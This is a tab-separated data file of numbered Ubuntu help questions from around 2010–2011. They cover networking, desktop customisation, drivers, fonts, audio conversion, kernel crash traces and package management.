18341	installing indicator-network loses network devices	i posted a question a little while ago about the network icon no longer showing in the indicator applet after upgrading to maverick . after reading this post , i looked in synaptic to see if i was missing any of the indicators , and it showed that indicator-network was n't installed , so i installed it . restarted my computer , and now all my network devices are gone . i removed the indicator applet from the panel , but still have awn running , so i looked at the network icon there . when i click on it , instead of showing me all my wireless network options , all it shows is `` no network devices available '' ( greyed out ) , and `` vpn connections '' with an available submenu of `` configure vpn '' . when i open the network connections dialog through the system preferences menu , it shows a list of connections accessed in the past , including the wireless network i want to be connected to ( and which was connected as of 8 minutes ago . ) what did i do ? as far as i know all i did was install an indicator icon , so why did it completely delete my network stuff ? and more importantly , how can i get it back ?
18342	awn - icons from theme ?	in awn , when you add a launcher , you can choose the icon to include . it gives you a choice - from theme or from file . ( see screenshot . ) what i 'm wondering is , where do the icons in the theme choice actually live ? are they individual graphic files that can be used elsewhere , or are they somehow local to awn ? i 'm particularly interested in the icons that do n't attach to actual standalone applications , like the gmail icon .
18345	how to resize the unity launcher ?	i want to resize the unity launcher . is that possible ?
18346	setting up dual screen vesa	i 'm wondering if it 's possible to set up dual screen using vesa as a driver ? and if anybody has a working xorg.conf sample that can post . i 'm using ubuntu 9.10 thanks
18348	nautilus does n't see setgid	i want to share a folder for two users , here is what i did : created group add users to group set chmod set chown set setgid 2775 reboot after that : echo test > /common/testfile - > group readable & writable created file using nautilus - > group readable , but not writable copied file using nautilus - > group readable , but not writable created file using gedit - > group readable & writable why ? is it a bug ? this was on a clean ubuntu 10.10 installation .
18350	unity under nx ?	i 've been reading about how the new compiz-based unity has issues with virtual box and what not . since nx effectively sets up a virtual interface/session , will unity work within an nx server session ? has anyone had any experience with this yet ?
18351	how to setup dhcp3-server to advertise the dns server the server itself has got from dhcp ?	the ubuntu 10.04 server has eth0 internet interface configured by means of an isp 's dhcp . at the same time the server has static eth0 lan interface to which it provides masquerading ( nat ) and lan-internal dhcp service ( dhcp3-server ) . as far as i 've understood the manual , i had to hardcode dns servers to advertise through lan dhcp with option domain-name-servers in dhcpd.conf . but what if the isp changes his dns server ip silently ( we use a soho-class isp , so this wo n't surprise me much ) ? can i configure dhcpd to advertise the dns server the server uses itself , the one gotten by its dhcp client mechanism ?
18352	how to enable moonlight ?	even after i 've installed all the mono packages , i am still asked to install silverlight when i visit silverlight-enabled web pages . even after i agreed to do this and installed the moonlight firefox extension from http : //go-mono.com/moonlight/ , nothing changed - silverlight applets still do n't work and ask to install silverlight ( directing to http : //go-mono.com/moonlight/ ) . how do i finally install it ? the situation is the same in ubuntu 10.10 and xubuntu 11.04 .
18357	how to install otf fonts ?	i know how to install true-type fonts ( by copy them to /usr/share/fonts/truetype and do sudo fc-cache -f ) but what about otf formats ? i did n't find a suitable folder to copy them .
18360	how to lock workstation in xubuntu ?	how to lock workstation in xubuntu ( xfce , xfwm ) ?
18366	dbus-daemon using too much ram	yesterday i discovered that dbus-daemon was taking from 10 % to 30 % of my ram . how can i reduce the amount of ram being used ?
18367	how to customize files context menu in xubuntu xfce thunar file manager ?	i generally prefer xfce desktop environment of xubuntu , but i found its files right-click context menu too humble ( no option to compress/decompress files for example , and i 'd like some my very special actions there too ) . how can i customize it ?
18369	how to delete all files that are returned by locate	at the moment his is what i do : step 1 : locate foobar /home/abc/foobar /home/abc/music/foobar step 2 : manually perform a removal , by copy-pasting each line . rm /home/abc/foobar rm /home/abc/music/foobar how do i do this in one step ? something like locate foobar > rm thanks .
18372	how can i find out what ram a computer system has ?	i 'm looking for a way to find out what kind of ram a system has ( clocking speed , ddr-x etc. ) . is there a specific command for that ? i 'm only aware of free or lspci which do n't offer those things .
18373	what information can be extracted from this system crash trace	my ubuntu ( jaunty ) system crashed recently with this trace . what information can i deduce from this trace ? i was logged in via ssh , and was trying to connect to a wifi network . ath_tx_start sounds like a function in madwifi driver . what locations should i search in to find further traces , and is there some place on the net where i can find help on the crash ? edit : i have just found that the processor on the machine is a geode processer and does not support pae , and i have installed the default kernel that comes with ubuntu server ( that uses pae ) . could this be causing the crash ? [ 399.757029 ] bug : unable to handle kernel paging request at d0c1510c [ 399.760789 ] ip : [ < d0cb5312 > ] ath_tx_start+0x1022/0x1440 [ ath_pci ] [ 399.760789 ] oops : 0000 [ # 1 ] [ 399.760789 ] last sysfs file : /sys/devices/pci0000:00/0000:00:0e.0/net/ath0/type [ 399.760789 ] dumping ftrace buffer : [ 399.760789 ] ( ftrace buffer empty ) [ 399.760789 ] modules linked in : wlan_scan_sta ath_rate_sample ath_pci wlan ath_hal ( p ) ipv6 lp parport loop evdev pcspkr scx200 ext3 jbd mbcache ide_gd_modr [ 399.760789 ] [ 399.760789 ] pid : 1918 , comm : sshd tainted : p ( 2.6.28-6-386 # 20-ubuntu ) [ 399.760789 ] eip : 0060 : [ < d0cb5312 > ] eflags : 00010046 cpu : 0 [ 399.760789 ] eip is at ath_tx_start+0x1022/0x1440 [ ath_pci ] [ 399.760789 ] eax : 00000240 ebx : 00000000 ecx : 0000001c edx : d0c147e0 [ 399.760789 ] esi : 00000001 edi : ce5b7878 ebp : ce45de54 esp : ce45dd64 [ 399.760789 ] ds : 007b es : 007b fs : 0000 gs : 0033 ss : 0068 [ 399.760789 ] process sshd ( pid : 1918 , ti=ce45c000 task=cde7cf80 task.ti=ce45c000 ) [ 399.760789 ] stack : [ 399.760789 ] 00000018 ce45de47 ce45de40 ce45de46 c030caf1 ce45dd94 00000246 c030caf1 [ 399.760789 ] 00000000 ce9569c0 031884a0 00007d2b cee684a0 00000246 ce45ddb0 c0309aec [ 399.760789 ] c0340737 00000000 00003fd0 ce0e05d0 ce424000 ce5b6000 ce5b0600 cee6681e [ 399.760789 ] call trace : [ 399.760789 ] [ < c030caf1 > ] ? __kfree_skb+0x31/0x80 [ 399.760789 ] [ < c030caf1 > ] ? __kfree_skb+0x31/0x80 [ 399.760789 ] [ < c0309aec > ] ? release_sock+0x7c/0x90 [ 399.760789 ] [ < c0340737 > ] ? tcp_cleanup_rbuf+0xe7/0x110 [ 399.760789 ] [ < c0309333 > ] ? sock_common_recvmsg+0x43/0x60 [ 399.760789 ] [ < c030d53c > ] ? dev_alloc_skb+0x1c/0x30 [ 399.760789 ] [ < d0cb57fd > ] ? ath_mgtstart+0xcd/0x1e0 [ ath_pci ] [ 399.760789 ] [ < c030d53c > ] ? dev_alloc_skb+0x1c/0x30 [ 399.760789 ] [ < d0c75ff5 > ] ? ieee80211_getmgtframe+0x65/0x90 [ wlan ] [ 399.760789 ] [ < d0c67ab5 > ] ? ieee80211_send_nulldata+0x115/0x170 [ wlan ] [ 399.760789 ] [ < c01403f3 > ] ? getnstimeofday+0x53/0x100 [ 399.760789 ] [ < d0c657a1 > ] ? ieee80211_node_timeout+0x2b1/0x300 [ wlan ] [ 399.760789 ] [ < c012f28d > ] ? run_timer_softirq+0x11d/0x1e0 [ 399.760789 ] [ < d0c654f0 > ] ? ieee80211_node_timeout+0x0/0x300 [ wlan ] [ 399.760789 ] [ < d0c654f0 > ] ? ieee80211_node_timeout+0x0/0x300 [ wlan ] [ 399.760789 ] [ < c012b037 > ] ? __do_softirq+0x67/0x110 [ 399.760789 ] [ < c01068f9 > ] ? timer_interrupt+0x29/0x60 [ 399.760789 ] [ < c012b12d > ] ? do_softirq+0x4d/0x50 [ 399.760789 ] [ < c012b21d > ] ? irq_exit+0x2d/0x40 [ 399.760789 ] [ < c0106221 > ] ? do_irq+0x71/0x90 [ 399.760789 ] [ < c019915d > ] ? sys_read+0x3d/0x70 [ 399.760789 ] [ < c01050b3 > ] ? common_interrupt+0x23/0x30 [ 399.760789 ] [ < c0380000 > ] ? atm_del_addr+0x130/0x150 [ 399.760789 ] code : 45 f3 8b 55 b8 8d 04 40 0f b7 44 82 2c 01 c3 eb 9d c7 04 24 2d eb cb d0 e8 ec 92 6d ef 0f 0b eb fe 0f b6 45 f3 8b 55 b8 8d 04 40 < 0f > b [ 399.760789 ] eip : [ < d0cb5312 > ] ath_tx_start+0x1022/0x1440 [ ath_pci ] ss : esp 0068 : ce45dd64 [ 399.760789 ] kernel panic - not syncing : fatal exception in interrupt
18374	how to understand the flow of usb detection ?	i would like to understand the flow of the usb events form the kernel space to the user space ( just out of my curiosity , in knowing how things are implemented ) . to be more clear , i would like to know how does that pop-up comes in my desktop when i plug a usb drive to my system and how does the drive gets mounted . i would also like to know how it finds out if some images are present in my usb and if `` yes '' , how it asks me whether i need to open it in gimp or some other software ? i know its a very big and wide question , but please guide me with some pointers on how to understand the whole idea behind it . i have not done large code browsings , but i assure you that i have no problem in doing so if i can be guided correctly .
18385	binding mouse buttons to copy and paste	often i 'm copying and pasting pieces of text . i 'd like to streamline the process . anyone know if it possible to bind ( for example ) : ctrl right click to copy and alt right click to paste
18387	how to view dvi files with evince	evince can not view my dvi files . is there any way to enable dvi viewing other than further installing ubuntu tex live packages ? opening it from the desktop gives document has incorrect format ; using the terminal gives warning : kpathsea : configuration file texmf.cnf not found in these directories : /usr/share/texmf/web2c : /usr/share/texmf-texlive/web2c : /usr/local/share/texmf/web2c ( if you are using tex live installed from tug , you can just use the provided xdvi to view dvi files . )
18389	rake command line	is there a way in ubuntu to have rake commands ( ruby ) available on the command line ? i solved adding the following line to bashrc , but i think there should be a better way . export path= $ path : $ home/bin : /var/lib/gems/1.8/bin have i forgot something ?
18395	which package should i use to file a bug for the `` application '' menu ?	i am testing natty and found an issue with the global menu , what is the proper package name to report the bug ?
18399	nokia paired via bluetooth and windows after reboot — possible ?	my nokia phone ( 5800 ) works well with ubuntu after bluetooth pairing . when i reboot to windows ( seven , in my case ) , it does n't — i have to remove it from 'paired bluetooth devices ' and then add again . the story repeats when i boot to ubuntu after windows . i have to remove the phone from known devices and pair it again . apparently , there are secret keys created after each pairing which are different between my ubuntu and windows installations ( or something alike ) . how do i make my phone recognize both ubuntu and windows — or how do i make ubuntu ( or windows ) use the same secret keys as the other os — or … ?
18403	how to incrementally update a live-usb ?	i have created a live usb from an ubuntu 11.04 daily cd image using usb disk creator . i have bandwidth constrains so i would like to update the live usb from a current daily cd image without downloading an entire image .
18406	how to set up java-based services for startup ?	what 's the best way to set up a java-based program to run an service and start on boot ? upstart ( pre-start script and post-stop script ? ) plain old sysv init ? ( start-stop-daemon ? ) in my case i am interested in setting up jira , which has its own tomcat-style start and stop scripts - $ jira_home/bin/startup.sh and $ jira_home/bin/shutdown.sh .
18411	how do i get a sb x-fi xtreme audio ca0110 working again after kernel update ?	i asked a question on how do i get a sb x-fi xtreme audio ca0110 working 3 days ago . and they told me to install the alsa driver modules from this website : https : //wiki.ubuntu.com/audio/installinglinuxalsadrivermodules this answer did work and my audio driver was working until i updated my kernel ... now the new kernel is linux 2.6.32-27 generic . how can i get alsa module driver to work on this new kernel ? or at least how can i go back to the old kernel . i tried to run this command : apt-get install linux-alsa-driver-modules- $ ( uname -r ) and this is what i get : could n't find package linux-alsa-driver-modules-2.6.32-27-generic thanks for help .
18413	what is nux and what 's it used for ?	this question mentions that unity will use nux as the toolkit . what exactly is nux ?
18416	does anybody know software for customising audio themes ?	i am interested in simple managing of audio themes in ubuntu ( 10.10 ) . does anybody know a software for customising/managing/changing ubuntu audio themes ? thanks for every suggestion . regards , vincenzo
18417	no sound after installing a new graphics card	i 've just upgraded my graphics card to an asus geforce 210 and now my system has no sound . i 've ran update manager and the additional drivers utility which installed the latest nvida driver . the graphics card is connected to my tv via a dvi-to-hdmi ( dvi at the pc end ) cable for the visual connection , and an audio jack from my onboard soundcard for my audio connection . any ideas on how to resolve this ? i ran this command ubuntu-bug audio and it outputted this : you seem to have configured pulseaudio to use the `` pci-0000_05_00.1 '' card , while you want output from `` nforce - nvidia ck804 '' . i 've tired a bit of messing about with the audio settings but ca n't get anything to work .
18418	how to set which application is launched by xdg-open ?	i have run update-alternatives as well as gnome preffered apps selection thing . and all point to have chromium browser as default . yet when i run xdg-open http : //askubuntu.com firefox is launched ! similarly emacs and bzr also launch stuff in firefox instead of chromium . are there any additional settings which affect xdg-open functionality ? something is definatly broken : update i have purged firefox : update-alternatives - uses chromium browser sensible-browser - opens chromium browser xdg-open & gnome-open - opens using google-chrome which kindly tells me `` it 's not default browser '' ! ! ! !
18425	how to use ubuntu in full screen mode on virtualbox ?	i have an hp laptop with windows 7 installed . how can i use ubuntu in full-screen mode via virtualbox or any other software ?
18428	will natty have the netbook-edition icons ?	when i compare the icons of unity in the ubuntu 10.10 with the icons of unity in ubuntu 11.04 the difference is huge . i find the icons in 10.10 more attractive to look at . is unity going to use these icons or stick with the current 11.04 ones ( which , in my personal opinion , do n't look as good ) ?
18429	how to quietly install ldap on ubuntu client	i 'd like to install libpam-ldap to use ldap on a client machine and i was hopping to use sudo apt-get install -qq libpam-ldap to quietly install the package as part of a bash script used to configure a client once ubuntu installs . however it still comes up with a blue screen gui asking for configuration information . since i intend to just copy an existing /etc/ldap.conf file to overwrite the auto generated one i 'd like to skip that step but do n't know how . how do you install a package and make it skip it 's interactive configuration stage ? thanks ! ! !
18440	what can i change/investigate where the install does not complete ?	i have already successfully installed ubuntu 10.10 on my laptop and it works fine . i attempted to get my desktop pc to dual boot windows and ubuntu but found that neither the 32 or 64 bit install images will boot/install successfully . the startup script locks on 'initializing core # 2 ' ( or 1 or 3 ) .. once i saw it say 'ok ' at the end but it still locks there . i have tried to change the boot sequence by inserting 'debug ' and 'acpi-off ' into txt.cfg in both isolinux and syslinux folders but no changes were obvious during the boot.. as far as it got . the pc is built with an abit ip35 motherboard and nvidia 8600gt gfx card . does anyone have any suggestion of what else i can change to get the install working ?
18444	how do i increase console-mode resolution ?	i 've recently clean-reinstalled maverick on my computer . it uses propietary nvidia drivers . everything runs just fine , except that i 'm seeing lots of ugly text when booting and shutting down ubuntu . i do n't mind the text at all ; in fact , i like seeing the startup/shutting down information . what i do n't like it 's its ugliness ! when my computer goes to console mode - ( booting up , shutting down or ctrl+alt+f1 ) the text is super big - i ca n't take a screenshot of it , but it looks like a 640x480 resolution . my monitor normally works at 1440x900 . i remember that the console text that appeared while installing from the cd was nice and small . how can i make the console text look like it looked while booting from the cd ?
18445	in which directories does gnome do look ?	i have 2 launchers for an application with the same name but that do different things . i 'd like to delete one of them so that the one that comes up in gnome do is the right one . the problem is that i do n't recall where the launchers are located . in which directories does gnome do look ?
18449	is there a fix for jockey failing to download package indexes ?	i 'm running the latest version of the proprietary nvidia driver , and i have n't had any problems enabling compiz effects until a few days ago after tweaking my theming . when i try to enable effects from the appearance panel , i get this popup window : and , after working for a few seconds it turns to this : launching jockey from the command line or application menu , it does n't recognize my proprietary drivers nor will it complete the package index download successfully . output of jockey.log : 010-12-21 11:31:52,242 debug : updating repository indexes ... 2010-12-21 11:31:58,162 debug : ... fail ! 2010-12-21 11:32:15,345 debug : updating < jockey.detection.localkernelmodulesdriverdb instance at 0x7f13ea279050 > 2010-12-21 11:32:15,346 debug : reading modalias file /lib/modules/2.6.35-22-generic/modules.alias 2010-12-21 11:32:15,506 debug : reading modalias file /usr/share/jockey/modaliases/bcmwl 2010-12-21 11:32:15,513 debug : reading modalias file /usr/share/jockey/modaliases/disable-upstream-nvidia 2010-12-21 11:32:15,571 debug : reading modalias file /usr/share/jockey/modaliases/fglrx-modules.alias.override 2010-12-21 11:32:15,579 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-173 2010-12-21 11:32:15,590 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-96 2010-12-21 11:32:15,593 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-current 2010-12-21 11:32:15,967 warning : _detect_handlers ( ) : no package repositories available , skipping check 2010-12-21 11:56:02,015 debug : updating repository indexes ... 2010-12-21 11:56:05,044 debug : ... fail ! 2010-12-21 11:56:22,847 debug : updating < jockey.detection.localkernelmodulesdriverdb instance at 0x7f071d91e2d8 > 2010-12-21 11:56:22,848 debug : reading modalias file /lib/modules/2.6.35-22-generic/modules.alias 2010-12-21 11:56:22,999 debug : reading modalias file /usr/share/jockey/modaliases/bcmwl 2010-12-21 11:56:22,999 debug : reading modalias file /usr/share/jockey/modaliases/disable-upstream-nvidia 2010-12-21 11:56:23,054 debug : reading modalias file /usr/share/jockey/modaliases/fglrx-modules.alias.override 2010-12-21 11:56:23,055 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-173 2010-12-21 11:56:23,057 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-96 2010-12-21 11:56:23,059 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-current 2010-12-21 11:56:23,402 warning : _detect_handlers ( ) : no package repositories available , skipping check 2010-12-21 11:56:30,662 debug : shutting down 2010-12-21 12:33:34,267 debug : updating repository indexes ... 2010-12-21 12:33:39,794 debug : ... fail ! 2010-12-21 12:34:01,366 debug : updating < jockey.detection.localkernelmodulesdriverdb instance at 0x7f28ff9202d8 > 2010-12-21 12:34:01,367 debug : reading modalias file /lib/modules/2.6.35-22-generic/modules.alias 2010-12-21 12:34:01,544 debug : reading modalias file /usr/share/jockey/modaliases/bcmwl 2010-12-21 12:34:01,545 debug : reading modalias file /usr/share/jockey/modaliases/disable-upstream-nvidia 2010-12-21 12:34:01,603 debug : reading modalias file /usr/share/jockey/modaliases/fglrx-modules.alias.override 2010-12-21 12:34:01,605 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-173 2010-12-21 12:34:01,607 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-96 2010-12-21 12:34:01,608 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-current 2010-12-21 12:34:01,960 warning : _detect_handlers ( ) : no package repositories available , skipping check 2010-12-21 12:37:20,743 debug : updating repository indexes ... 2010-12-21 12:37:23,362 debug : ... fail ! 2010-12-21 12:37:23,367 debug : shutting down 2010-12-21 14:44:08,534 debug : updating repository indexes ... 2010-12-21 14:44:14,607 debug : ... fail ! 2010-12-21 15:56:17,036 debug : updating repository indexes ... 2010-12-21 15:56:21,282 debug : ... fail ! 2010-12-21 15:56:39,950 debug : updating < jockey.detection.localkernelmodulesdriverdb instance at 0x1cc72d8 > 2010-12-21 15:56:39,952 debug : reading modalias file /lib/modules/2.6.35-22-generic/modules.alias 2010-12-21 15:56:40,154 debug : reading modalias file /usr/share/jockey/modaliases/bcmwl 2010-12-21 15:56:40,154 debug : reading modalias file /usr/share/jockey/modaliases/disable-upstream-nvidia 2010-12-21 15:56:40,213 debug : reading modalias file /usr/share/jockey/modaliases/fglrx-modules.alias.override 2010-12-21 15:56:40,214 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-173 2010-12-21 15:56:40,217 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-96 2010-12-21 15:56:40,219 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-current 2010-12-21 15:56:40,619 warning : _detect_handlers ( ) : no package repositories available , skipping check 2010-12-21 18:44:24,984 debug : updating repository indexes ... 2010-12-21 18:44:31,786 debug : ... fail ! 2010-12-21 18:44:49,601 debug : updating < jockey.detection.localkernelmodulesdriverdb instance at 0x1da73b0 > 2010-12-21 18:44:49,603 debug : reading modalias file /lib/modules/2.6.35-22-generic/modules.alias 2010-12-21 18:44:49,864 debug : reading modalias file /usr/share/jockey/modaliases/bcmwl 2010-12-21 18:44:49,866 debug : reading modalias file /usr/share/jockey/modaliases/disable-upstream-nvidia 2010-12-21 18:44:49,917 debug : reading modalias file /usr/share/jockey/modaliases/fglrx-modules.alias.override 2010-12-21 18:44:49,919 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-173 2010-12-21 18:44:49,922 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-96 2010-12-21 18:44:49,923 debug : reading modalias file /usr/share/jockey/modaliases/nvidia-current 2010-12-21 18:44:50,224 warning : _detect_handlers ( ) : no package repositories available , skipping check 2010-12-21 18:46:19,366 debug : updating repository indexes ... 2010-12-21 18:46:24,865 debug : ... fail ! does anyone know of a way to fix this ? i miss my effects .
18450	shutter 's -- selection command line option is missing	in karmic , shutter used to have a commandline option called -- selection , which i 've used in a hack to replace gnome-screenshot with the funcionality of shutter . however , this option does n't not exist anymore , but instead -- select exists ... the problem being , that -- select will immediately open the shutter mainwindow , without allowing me to select anything . the contextmenu of shutter still has the 'selection ' option , which makes me wonder why the commandline option had been removed . is there a different way to toggle the selection option in shutter from the commandline ?
18451	how to hide ( in thunar and nautilus ) a directory without putting a dot in its name ?	usually linux programs store user 's settings in ~/ . * directories . but unfortunately some developers ( of some applications i need ) do not follow this rule and do n't start their settings storage folders names with a dot . this results in never-user-used folders cluttering ( not the right word perhaps , as there are not many , but they annoy anyway ) a home directory . renaming them is not an option , as the applications wo n't find them in this case ( and will create them again ) . is there a way to hide a folder having no dot starting its name from being displayed in common file system browsers ( i actually use thunar of xfce , alongside with midnight commander and krusader , but would n't mind to know about nautilus too ) .
18453	are there easier ways to report about malfunctions experienced while using ubuntu other than using particular bug trackers ?	i use xubuntu on a computer with an intel 82852/82855gm video card and have a nasty problem with video playback : after some time of playback a video player screen comes just blue , and when i close it my screen is filled with garbage and the system hangs . the workaround i 've found is using mplayer with -vo x11 to render it software . i understand ( because the same case caused similar problem in arch i used half a year ago , not just ubuntu , and the problem never occurs when i use other window managers than xfwm ) that this is probably a problem of the combination of my intel card with xfwm . from this comes the problem - where to submit the bug - to xfce bug tracker or to intel one ( which i even have no idea where to look for ) . at the same time i would n't like to register in those issue trackers just to use them once . so i am not straight about submitting the bug , but can explain clearly how to reproduce it , which , i believe can itself still be a useful contribution to the community . so , is there a way to submit a bug i 've experienced without complications , for better-qualified specialists to review it and put into corresponding issue trackers themselves if they are n't there yet ?
18454	howto convert audio files to *.m4a ?	i want to convert a lot of *.flac and some high bitrate *.mp3 files to *.m4a files . i want to use a fixed bitrate of 192kb ( stereo ) and want to keep the audiotags ( except of , obviously , the tag `` bitrate '' - this sshould nbe set to the correct 192kb. ) . i 'm using 64-bit maverick . i tried about every program i could find . including sound converter soundkonverter ( kde ) winff arista transcoder , handbrake , transmageddon ( fails , seems only video works ) ffmpeg ( tried `` -acodec libfaac -ab 192k -map_meta_data outfile.m4a : infile.mp3 '' ) but either they do n't transfer the tags or they do n't offer any way to set the bitrate to fixed 192kb or the resulting file does n't show the new bitrate in any audio program ( for example : nautilus saying `` bitrate '' n.a . `` ) !
18462	expanding your home directory size	i would like to copy or expand my /home directory ... all tutorials talks about moving the home directory from a partition to another but the problem that i only have one partition that was more than 300 gigs ( before i resize it and create a new partition ) although i see 30 gigs only on my home directory ( 4 gigs left : ( ) i resized it and created a new partition as you can see in the next image i 've tried booting from ubuntu live cd and from a usb and what i can see in gparted is exactly as in the picture below i would like to move my home directory to the new partition of expand it . this is a snapshot of what i can see on my gparted ( note : the new partition is never used i just created it ) http : //www.ps-revolution.net/pic/afc3cbbf9f1ba853b2d62f03cf132e8c.png this is from disk utilities http : //www.ps-revolution.net/pic/d40aa2975f8b1679d867f7ef2587089b.png thanks in advance
18465	is there an explanation , including diagrams , of ubuntu 's usb stack ?	i would like to view a diagrammatic explanation of how ubuntu 's usb stack works . is there any provision for that ? if yes , please guide me to it . thanks , sen
18466	how can i repair casper-rw file system file in liveusb	while booting ubuntu and mounting my casper-rw file for persistent storage , ubuntu recommends me to check for errors using fsck . however , when i boot into my system , since the casper-rw is automatially mounted and can not be unmounted , it refuses to repair errors in my casper file system . even if i boot without persistent option , fsck can not repair my casper-rw file saying that its read-only file system . is there any way to check and repair errors in casper-rw ?
18468	how to add music to an image with mencoder	i 'm trying to use mencoder to make a video that has music playing over a single image . i 'm using mf to add the image and i always get a video with about one second of audio with a reported length of 0:00 . i 've tried with a variety of mp3 's and images from different sources and i tried using various codecs and options but i ca n't seem to get past this problem . here 's the basic command : mencoder `` mf : //image.jpg '' -o out.avi -ovc lavc -lavcopts vcodec=mjpeg -audiofile music.mp3 -oac copy does anyone know how to do this or why mencoder cuts the music to one second ?
18474	no grub entry for windows 7 after installing maverick	a friend of mine had windows 7 and windows xp running in his sony vaio . i replaced windows xp with ubuntu 10.10 . after that the laptop directly boots into ubuntu . even the grub menu does not appear during startup . i tried sudo update-grub , sudo update-burg but windows was not recognized . how can i solve this issue ?
18482	what 's the recommended way to configure a synaptics touchpad device ?	i want to increase the scroll area by moving the so-called rightedge a bit towards the middle . right now i 'm doing this via a one-liner that 's called at session start ( added via gnome-session-properties ) : xinput -- set-prop -- type=int -- format=32 11 252 1781 5125 1646 4582 this works fine , but feels like a hack . what 's the recommended way to edit/set touchpad device properties like this one ? few years ago i 'd have put that into the xorg.conf , but this seems to be discouraged nowadays .
18484	can i log to a non-default shell ?	i love fish . i have a nice ubuntu 8.04 server running some services . so i edited the /etc/passwd file , as i did in the past , to change my default shell from bash to fish . and , yes , i made i typo ( btw : i know about chsh , i 'm just that stupid and overconfident ) . please , stop laughing . as expected , now i ca n't login . is it possible log in without restarting the server ? . i know that i can restart the server in safe mode and solve the mess , but i 'd like to avoid it . oh yeah , i have no other user with sudo rights in that server . stop laughing again . btw , i made the mess using ssh , but i have easy physical access to the server , it 's just a couple of rooms away .
18486	ubuntu one music app for android not displaying artwork	i have n't been able to get my album art to display in the android app and have been searching for answers all morning . the artwork is in the tags properly , i 've tried both mp3 and ogg to no avail . the only thing i was able to find was a post on a google group from sept 30th saying artwork was n't supported yet , but i 'm wondering if that 's still the case and noticed subsonic for android displays artwork correctly in its screenshots .
18487	how do i get musical backing tracks to be heard in my videos i take with cheese ?	i just discovered the cheese webcam booth , and for all practical intents and purposes , it is perfect for what i want to do in shooting videos of myself playing my electric guitar . i am using my boss gt-10 effects processor as my external usb soundcard , and on my videos , my guitar comes through like a champ . my problem is this : i need for my pre-recorded backing tracks to come through in the audio on my videos , yet they are not coming through . what do i do to effect this ?
18491	nagios3 crashes with sigsegv	i installed nagios3 on ubuntu server 10.04.1 . it was working fine . today , i found it stopped and when i tried to start it using sudo /etc/init.d/nagios3 start , it did not start . i found this in the log file : nagios 3.2.0 starting ... ( pid=11729 ) local time is wed dec 22 14:15:31 2010 caught sigsegv , shutting down ... i tried to remove and re-install it without success . after googling , it seems that no one has a solution for this . i do n't want to install it from source unless it is really the last hope .
18493	where should i start in tracking down firefox malware	switched my sister to ubuntu because i got tired of re-installing the other os every 6 months . now she managed to get some malware in her firefox on ubuntu . without access to the computer ( or when i get it next week ) , where should i look , what questions can i ask , what could i tell a computer novice to try over the phone ? symptoms : while surfing some recipe site she had an ad-window pop up with no window controls . she rebooted the computer and when she re-started firefox it came back , full screen , no controls , on top . i told her to just use -f2 and xkill to get rid of it , which it did but stopped firefox completely . on re-start it was back , i told her to hit f11 which did take it back to a large screen , but not full-screen , so she could see that there was a normal browser window running underneath . she topped the normal window but the only other thing i had time to check was plug-ins , which there was n't anything that sounded suspicious . i 'm looking for ideas of what to try over the phone , or where to start next week . i 'm comfortable with the command line , and using about : config if that makes any difference in the answer .
18495	which pdf viewer would you recommend ?	which pdf-viewer would you recommend to use in ubuntu ? at the moment i use the standard document viewer ( evince ) but i 'm missing features like stageless continous zooming .
18498	how to upgrade to a newer version of a package than is available in the repository ?	while using an open source genealogy program i encountered an error . i submitted a bug report and the author quickly fixed the problem ( yay for open source ! ) . now i want off course to try the latest release ( 3.2.5 ) of this program ( which includes the bugfix for my problem ) . apt-get tells me that the version i have installed ( 3.2.3-1 ) is already the newest version . so what is the best way to upgrade to a newer version of a package then is available in the repositories ? do i : remove the version i have currently installed with the package manager . download the source of the newest version and compile it myself ? will this give problems when newer versions come out ? will i have to update this program manually in the future whenever newer versions come out ? should i do the above , but with a program like checkinstall , and remove the manually compiled version once the version can be installed via the package manager ? should i make a request for the package to be backported ? i think my request will make little chance because the rules read : applications to be backported must have meaningful benefits to the user not attainable via other processes . specifically : the sole purpose must not be to fix a bug or security vulnerability . or is there another way to do this correctly ?
18502	how to solve this problem starting new opera-windows on dual monitor-setup ?	i use opera and have a setup with two monitors . if i want to open a new url opera -newwindow url . the outcome differs , if i execute this command in a program on the same screen where opera is , or on the other . on the same screen everything is fine . i get the message opera : activated running instance and the new window with the url is opened . on the other screen , i get a dialog with the following message : it appears another opera instance is using the same configuration directory because its lock file is active : /home/ ( my name ) /.opera/lock and the url is not shown . that 's not only from console , also if i click a link in e-mail or so . how can i fix this ? window-manager is awesome , if it does make a difference .
18508	kubuntu knetworkmanager ip	i have 2 internet providers . one - wifi and another - eth0 . settings for both connections are stored in knetworkmanager . everything was ok , but today i can not switch to eth0 . when i switch to eth0 , ( ip ..0.29 ) my ip become ..0.108 ! but i never use such ip in network manager . please help !
18509	how can i make another pdf viewer default for pdf files ?	how can i make another pdf viewer standard for pdf files in ubuntu ?
18517	error when plugging ipod touch into macbook	whenever i plug my ipod touch ( 2nd gen ) into my macbook running ubuntu 10.10 i get the following error : dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) it will show up in the file browser but whenever i try to mount it i get that error . edit : i thought that this might be because i had it plugged into a dock , but i tried plugging it in directly to the macbook with the usb cable and it still does not work , same error message .
18520	where i can get application to work with my kml files ?	they are stored in *.kml format . early in windows 7 i open them with google earth , but for now i do n't have win7 and google earth . google earth for linux wrongly determines the place of workout on map . this is why i had ask this question .
18523	how do i resize my current ubuntu partition ?	i 've got ubuntu 10.10 installed to use my whole hard-disk , but would like to use the 130gb of free space i 've got to create a new partition and do some development on unity and natty . can i use gparted to do this ? if so how ?
18526	windows 7 virtualized on ubuntu server	i have an issue , we are moving to a production build server now . i need a virtual machine up and running on my ubuntu 10.10 server edition . i have to setup and install various tool and plugins , on this windows 7 virtual machine as well the problem i am facing is how do i install windows 7 on this machine ( ubuntu 10.10 server ) also , how am i supposed to gain access to it in order to install tools that are required on it . i would prefer virtual box as my tool of choice . please and thank you .
